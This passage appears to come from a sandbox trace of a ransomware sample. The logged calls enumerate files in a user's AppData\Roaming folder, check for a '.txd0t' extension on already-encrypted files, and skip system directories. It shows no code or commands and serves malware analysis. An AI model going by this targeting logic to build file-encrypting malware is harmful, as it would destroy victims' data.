(psz1="PDHYzrp.wav.txd0t", psz2="..") returned 1 [0090.039] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PDHYzrp.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t" [0090.039] PathFindExtensionW (pszPath="PDHYzrp.wav.txd0t") returned=".txd0t" [0090.039] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.039] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4dde220, ftCreationTime.dwHighDateTime=0x1d5ee16, ftLastAccessTime.dwLowDateTime=0xc522b3d0, ftLastAccessTime.dwHighDateTime=0x1d5ea40, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16842, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PjcNBr9EvQRuRkXhA.swf.txd0t", cAlternateFileName="PJCNBR~1.TXD")) returned 1 [0090.039] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf.txd0t", psz2=".") returned 1 [0090.039] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf.txd0t", psz2="..") returned 1 [0090.039] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PjcNBr9EvQRuRkXhA.swf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t" [0090.039] PathFindExtensionW (pszPath="PjcNBr9EvQRuRkXhA.swf.txd0t") returned=".txd0t" [0090.039] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.039] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601f7690, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0x162740b0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13c70, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="pMTil.png.txd0t", cAlternateFileName="PMTILP~1.TXD")) returned 1 [0090.039] StrCmpW (psz1="pMTil.png.txd0t", psz2=".") returned 1 [0090.039] StrCmpW (psz1="pMTil.png.txd0t", psz2="..") returned 1 [0090.039] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="pMTil.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t" [0090.039] PathFindExtensionW (pszPath="pMTil.png.txd0t") returned=".txd0t" [0090.039] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.039] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb8ec20, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x4d8cc740, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x5050a777, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18d33, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="QsWrg_KB.mp3.txd0t", cAlternateFileName="QSWRG_~1.TXD")) returned 1 [0090.039] StrCmpW (psz1="QsWrg_KB.mp3.txd0t", psz2=".") returned 1 [0090.039] StrCmpW (psz1="QsWrg_KB.mp3.txd0t", psz2="..") returned 1 [0090.039] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.039] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="QsWrg_KB.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t" [0090.039] PathFindExtensionW (pszPath="QsWrg_KB.mp3.txd0t") returned=".txd0t" [0090.039] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.039] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1f48f0, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x4a2ac600, ftLastAccessTime.dwHighDateTime=0x1d5e571, ftLastWriteTime.dwLowDateTime=0x50530b55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16f6a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s8RH8_.mp3.txd0t", cAlternateFileName="S8RH8_~1.TXD")) returned 1 [0090.040] StrCmpW (psz1="s8RH8_.mp3.txd0t", psz2=".") returned 1 [0090.040] StrCmpW (psz1="s8RH8_.mp3.txd0t", psz2="..") returned 1 [0090.040] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="s8RH8_.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t" [0090.040] PathFindExtensionW (pszPath="s8RH8_.mp3.txd0t") returned=".txd0t" [0090.040] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.040] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac925c0, ftCreationTime.dwHighDateTime=0x1d5e2ad, ftLastAccessTime.dwLowDateTime=0x51c69580, ftLastAccessTime.dwHighDateTime=0x1d5edda, ftLastWriteTime.dwLowDateTime=0x50556d6e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1e27, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SKsJaHK4avL.odp.txd0t", cAlternateFileName="SKSJAH~1.TXD")) returned 1 [0090.040] StrCmpW (psz1="SKsJaHK4avL.odp.txd0t", psz2=".") returned 1 [0090.040] StrCmpW (psz1="SKsJaHK4avL.odp.txd0t", psz2="..") returned 1 [0090.040] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="SKsJaHK4avL.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t" [0090.040] PathFindExtensionW (pszPath="SKsJaHK4avL.odp.txd0t") returned=".txd0t" [0090.040] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.040] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0090.040] StrCmpW (psz1="Skype", psz2=".") returned 1 [0090.040] StrCmpW (psz1="Skype", psz2="..") returned 1 [0090.040] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Skype", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0090.040] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system32\\") returned 0x0 [0090.040] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.040] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system\\") returned 0x0 [0090.040] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.040] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Skype" [0090.040] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe46ce0, ftCreationTime.dwHighDateTime=0x1d5e3af, ftLastAccessTime.dwLowDateTime=0xab0ee800, ftLastAccessTime.dwHighDateTime=0x1d5e1c7, ftLastWriteTime.dwLowDateTime=0x50556d6e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13735, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="sT1K.flv.txd0t", cAlternateFileName="ST1KFL~1.TXD")) returned 1 [0090.040] StrCmpW (psz1="sT1K.flv.txd0t", psz2=".") returned 1 [0090.040] StrCmpW (psz1="sT1K.flv.txd0t", psz2="..") returned 1 [0090.040] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.040] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="sT1K.flv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t" [0090.041] PathFindExtensionW (pszPath="sT1K.flv.txd0t") returned=".txd0t" [0090.041] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.041] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0090.041] StrCmpW (psz1="Sun", psz2=".") returned 1 [0090.041] StrCmpW (psz1="Sun", psz2="..") returned 1 [0090.041] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Sun", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0090.041] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0090.041] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.041] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0090.041] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.041] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Sun" [0090.041] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4573a5c0, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0xf0e99590, ftLastAccessTime.dwHighDateTime=0x1d5e434, ftLastWriteTime.dwLowDateTime=0x5057e259, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16ff9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U6XvU G.bmp.txd0t", cAlternateFileName="U6XVUG~1.TXD")) returned 1 [0090.041] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2=".") returned 1 [0090.041] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2="..") returned 1 [0090.041] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U6XvU G.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t" [0090.041] PathFindExtensionW (pszPath="U6XvU G.bmp.txd0t") returned=".txd0t" [0090.041] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.041] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3606c4c0, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0xd600a6e0, ftLastAccessTime.dwHighDateTime=0x1d5e99a, ftLastWriteTime.dwLowDateTime=0x5057e259, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x242a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U9jIHqltNvJBusuu8M.m4a.txd0t", cAlternateFileName="U9JIHQ~1.TXD")) returned 1 [0090.041] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2=".") returned 1 [0090.041] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2="..") returned 1 [0090.041] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U9jIHqltNvJBusuu8M.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t" [0090.041] PathFindExtensionW (pszPath="U9jIHqltNvJBusuu8M.m4a.txd0t") returned=".txd0t" [0090.041] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.041] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa572ba20, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0xcfd02e20, ftLastAccessTime.dwHighDateTime=0x1d5e419, ftLastWriteTime.dwLowDateTime=0x505a3185, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1638f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="uBqsl.png.txd0t", cAlternateFileName="UBQSLP~1.TXD")) returned 1 [0090.041] StrCmpW (psz1="uBqsl.png.txd0t", psz2=".") returned 1 [0090.041] StrCmpW (psz1="uBqsl.png.txd0t", psz2="..") returned 1 [0090.042] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="uBqsl.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t" [0090.042] PathFindExtensionW (pszPath="uBqsl.png.txd0t") returned=".txd0t" [0090.042] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9667b070, ftCreationTime.dwHighDateTime=0x1d5edbc, ftLastAccessTime.dwLowDateTime=0x56e267f0, ftLastAccessTime.dwHighDateTime=0x1d5e25a, ftLastWriteTime.dwLowDateTime=0x506158a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12c1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="UFfU-NQWoB7XyHy.mp3.txd0t", cAlternateFileName="UFFU-N~1.TXD")) returned 1 [0090.042] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2=".") returned 1 [0090.042] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2="..") returned 1 [0090.042] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="UFfU-NQWoB7XyHy.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t" [0090.042] PathFindExtensionW (pszPath="UFfU-NQWoB7XyHy.mp3.txd0t") returned=".txd0t" [0090.042] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c250f10, ftCreationTime.dwHighDateTime=0x1d5e8f7, ftLastAccessTime.dwLowDateTime=0xbec39840, ftLastAccessTime.dwHighDateTime=0x1d5ea15, ftLastWriteTime.dwLowDateTime=0x5063bb10, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14b23, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wL6CtWVaL-45s.odp.txd0t", cAlternateFileName="WL6CTW~1.TXD")) returned 1 [0090.042] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2=".") returned 1 [0090.042] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2="..") returned 1 [0090.042] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="wL6CtWVaL-45s.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t" [0090.042] PathFindExtensionW (pszPath="wL6CtWVaL-45s.odp.txd0t") returned=".txd0t" [0090.042] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d4ae90, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0xd8987d80, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x5063bb10, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8c81, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="XqhhUYjJL0U.rtf.txd0t", cAlternateFileName="XQHHUY~1.TXD")) returned 1 [0090.042] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2=".") returned 1 [0090.042] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2="..") returned 1 [0090.042] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.042] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="XqhhUYjJL0U.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t" [0090.042] PathFindExtensionW (pszPath="XqhhUYjJL0U.rtf.txd0t") returned=".txd0t" [0090.042] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c144d0, ftCreationTime.dwHighDateTime=0x1d5e507, ftLastAccessTime.dwLowDateTime=0x74880b60, ftLastAccessTime.dwHighDateTime=0x1d5ee68, ftLastWriteTime.dwLowDateTime=0x50661db2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11897, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YDXeffFC99vGn.mp3.txd0t", cAlternateFileName="YDXEFF~1.TXD")) returned 1 [0090.042] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2=".") returned 1 [0090.042] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2="..") returned 1 [0090.042] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") 